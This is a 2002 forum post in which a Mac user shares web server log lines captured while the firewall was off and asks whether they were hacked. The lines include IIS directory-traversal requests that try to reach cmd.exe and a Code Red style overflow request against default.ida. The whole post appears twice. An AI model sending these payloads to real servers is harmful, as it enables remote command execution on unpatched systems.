buc99
Don't Tread on Me!
I turned off the firewall on my mac to update some data with quicken since quicken was using a port that I did not know that was being blocked by my firewall. (By the way does anyone know what port quicken uses for online banking?) Stupid me I forgot to turn the firewall app back on. I noticed a lot of activity on my cable modem and I was not using my computer. So I checked the access_log with "tail /var/log/http/access_log" and found the following:
xxx.xxx.xxx.xxx - - [07/Oct/2002:21:41:49 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 352
xxx.xxx.xxx.xxx - - [07/Oct/2002:21:41:52 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 318
xxx.xxx.xxx.xxx - - [07/Oct/2002:21:41:55 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 318
xxx.xxx.xxx.xxx - - [07/Oct/2002:21:42:01 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 318
xxx.xxx.xxx.xxx - - [07/Oct/2002:21:42:04 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 318
xxx.xxx.xxx.xxx - - [07/Oct/2002:21:42:06 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 302
xxx.xxx.xxx.xxx - - [07/Oct/2002:21:42:09 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 302
xxx.xxx.xxx.xxx - - [07/Oct/2002:21:42:12 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 319
xxx.xxx.xxx.xxx - - [07/Oct/2002:21:42:15 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 319
199.173.12.4 - - [07/Oct/2002:22:00:21 -0500] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 339
The xxx.xxx.xxx.xxx of course is my IP address that I x'd out. What is all of this winnt stuff? Am I infected? Has someone hacked me? If so who and how do I get them in return?
Do I need to wipe my computer and re-install?
Yes I know this was a boneheaded mistake, but I sometimes neglect this computer.
Thanks in Advance.
SA

xxx.xxx.xxx.xxx - - [07/Oct/2002:21:41:49 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 352
xxx.xxx.xxx.xxx - - [07/Oct/2002:21:41:52 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 318
xxx.xxx.xxx.xxx - - [07/Oct/2002:21:41:55 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 318
xxx.xxx.xxx.xxx - - [07/Oct/2002:21:42:01 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 318
xxx.xxx.xxx.xxx - - [07/Oct/2002:21:42:04 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 318
xxx.xxx.xxx.xxx - - [07/Oct/2002:21:42:06 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 302
xxx.xxx.xxx.xxx - - [07/Oct/2002:21:42:09 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 302
xxx.xxx.xxx.xxx - - [07/Oct/2002:21:42:12 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 319
xxx.xxx.xxx.xxx - - [07/Oct/2002:21:42:15 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 319
199.173.12.4 - - [07/Oct/2002:22:00:21 -0500] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 339
The xxx.xxx.xxx.xxx of course is my IP address that I x'd out. What is all of this winnt stuff? Am I infected? Has someone hacked me? If so who and how do I get them in return?
Do I need to wipe my computer and re-install?
Yes I know this was a boneheaded mistake, but I sometimes neglect this computer.
Thanks in Advance.
SA
